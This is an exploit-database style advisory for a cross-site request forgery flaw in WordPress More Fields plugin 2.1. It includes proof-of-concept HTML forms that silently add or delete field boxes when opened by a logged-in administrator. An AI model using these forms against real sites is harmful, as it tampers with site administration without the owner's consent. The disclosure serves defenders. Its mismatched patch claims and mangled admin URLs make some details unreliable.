Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery

vendor:

More Fields Plugin

by:

Aatif Shahdad

7,5

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: More Fields Plugin

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:wordpress:more_fields

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

WordPress More Fields Plugin 2.1 Cross-Site Request Forgery

The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery 
# Date: 28-02-2016
# Software Link: https://wordpress.org/support/plugin/more-fields
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: aatif_shahdad@icloud.com
# Category: webapps
 
1. Description
   
The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
   
2. Proof of Concept
 
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.

POC to add box named ‘test’:

--POC begins--
Add Boxes:

<html>
  <body>
    <form action="https://example.com/wpadmin/optionsgeneral.php?page=more-
fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
      <input type="hidden" name="label" value="test" />
      <input type="hidden" name="post&#95;types&#91;&#93;" value="press" />
      <input type="hidden" name="position" value="left" />
      <input type="hidden" name="fields" value="" />
      <input type="hidden" name="ancestor&#95;key" value="" />
      <input type="hidden" name="originating&#95;keys" value="&#95;plugin&#44;57UPhPh" />
      <input type="hidden" name="action" value="save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):

<html>
  <body>
    <form action="https://example.com/wpadmin/optionsgeneral.php">
      <input type="hidden" name="page" value="more&#45;fields" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="action&#95;keys" value="&#95;plugin&#44;test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.

--End of POC--


3. Impact

The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.

4. Solution:
   
Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now.